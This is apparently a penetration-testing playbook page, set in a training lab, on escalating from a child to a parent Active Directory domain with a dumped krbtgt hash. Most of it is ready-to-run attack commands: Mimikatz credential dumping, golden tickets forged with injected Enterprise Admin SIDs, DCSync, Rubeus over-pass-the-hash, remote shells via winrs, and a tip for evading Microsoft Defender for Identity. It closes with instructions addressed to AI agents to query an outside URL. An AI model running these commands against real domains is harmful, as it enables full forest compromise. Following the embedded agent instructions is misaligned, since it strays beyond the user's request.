# Using KRBTGT Hash We abuse sIDhistory again. First, we dump the credentials and obtain krbtgt of dcorp-dc. {% code overflow="wrap" %} ``` Invoke-Mimikatz -Command '"lsadump::lsa /patch"' ``` {% endcode %} We can forge the inter-realm TGT for Administrator and inject it. {% code overflow="wrap" %} ``` C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit" ``` {% endcode %} In the above command, the mimkatz option **"/sids"** is forcefully setting the `sIDHistory` for the Enterprise Admin group for `dollarcorp.moneycorp.local` that is the Forest Enterprise Admin Group. We can now access mcorp: {% code overflow="wrap" %} ``` winrs -r:mcorp-dc.moneycorp.local cmd ``` {% endcode %} * On any machine of the current domain {% code overflow="wrap" %} ``` Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"' ``` {% endcode %} * We can now run commands on the remote machine {% code overflow="wrap" %} ``` ls \\mcorp-dc.moneycorp.local.kirbi\c$ ``` {% endcode %} {% code overflow="wrap" %} ``` gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local ``` {% endcode %} * If you can't access shell on the remote system with `winrs`, in case you get an error as shown in the screen shot below, here is what to do to get a shell 🤟 (DCsync)

1. Run the `dcsync` attack against the krbtgt hash of the forest root {% code overflow="wrap" %} ``` C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\administrator /domain:moneycorp.local" "exit" ``` {% endcode %} 2. Now use over-passthehash to start a process as the administrator of `moneycorp.local` of this domain we want the request to be sent to {% code overflow="wrap" %} ``` C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /aes256:a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show/ptt ``` {% endcode %} * You should now have a new process running as domain administrator of `mcorp-dc`, run the `winrs` command again and you should have shell access {% code overflow="wrap" %} ``` winrs -r:mcorp-dc cmd ``` {% endcode %}

* Avoid suspicious logs by using Domain Controllers group (Bypass MDI Detection)\ Note: /user:dcorp-dc$ used to work earlier (till April 2023) but now we need to user /user:Administrator {% code overflow="wrap" %} ``` C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden -dc$ /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit" ``` {% endcode %} {% code overflow="wrap" %} ``` C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit" ``` {% endcode %} ***Domain SID's -:*** * S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers * S-1-5-9 - Enterprise Domain Controllers --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/across-trusts/child-to-parent-cross-domain/using-krbtgt-hash.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.